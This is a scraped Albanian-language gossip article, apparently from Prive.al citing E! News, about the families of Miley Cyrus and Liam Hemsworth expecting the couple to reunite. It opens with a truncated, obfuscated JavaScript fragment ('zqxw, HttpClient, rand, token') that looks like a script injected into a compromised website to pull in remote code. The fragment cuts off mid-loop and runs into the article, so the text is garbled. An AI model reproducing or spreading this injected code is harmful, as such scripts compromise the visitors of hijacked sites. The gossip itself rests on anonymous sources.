;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

E thonë familjet – Miley Cyrus dhe Liam Hemsworth mund të pajtohen sërish

By

Miley Cyrus dhe Liam Hemsworth mund të jenë ndarë, mirëpo sa u përket familjeve të tyre, në mes çiftit mund të mos ketë përfunduar ende e tëra.

Para së gjithash, janë bërë 10-të vjet që publiku sheh pajtime e ndarje nga çifti ndërsa më parë, ata i kishin dhënë fund fejesës, kishin dalë me njerëz të tjerë dhe madje kishin publikuar këngë të dhimbshme që i dedikoheshin lidhjes së tyre.

Miley Cyrus, Liam Hemsworth, 2019 Vanity Fair Oscar Party, 2019 Oscars

Mirëpo çifti gjithmonë ia kanë dalë që t’i lënë anash dallimet që kanë dhe ta gjejnë një rrugë të jenë së bashku.

Burime të revistë amerikane E! News, kanë thënë se familjet e çiftit ende mendojnë se ata do të ribashkohen.

“Familjet e tyre u kanë thënë që të marrin pak kohë larg njëri tjetrit para se të ndërmarrin ndonjë vendim final. Ata të dy janë të zemëruar me njëri tjetrin dhe të dy janë të lënduar tani”.

Por siç e thotë edhe Miley në këngën e saj të re Slide Away që i dedikohet pikërisht ndarjes nga Liam, gjërat nuk kanë shkuar siç ata kishin shpresuar se do shkonin.

Po i njëjti burim ka thënë për revistën se para dasmës, ata ishin shumë mirë me njëri tjetrin mirëpo pastaj, gjërat kanë ndryshuar shumë në mes tyre.

“Miley nisi punën në studio dhe ishte e fokusuar në muzikën e saj, ndërsa Liam gjatë tërë kohës dilte nëpër festa me miqtë e tij dhe nuk sillej si një burrë i martuar. Miley e ka kaluar fazën e festave dhe s’ishte më e interesuar në gjëra të tilla”, shkruan E! Neës, transmeton Prive. /Prive.al

Artikuj të ngjashëm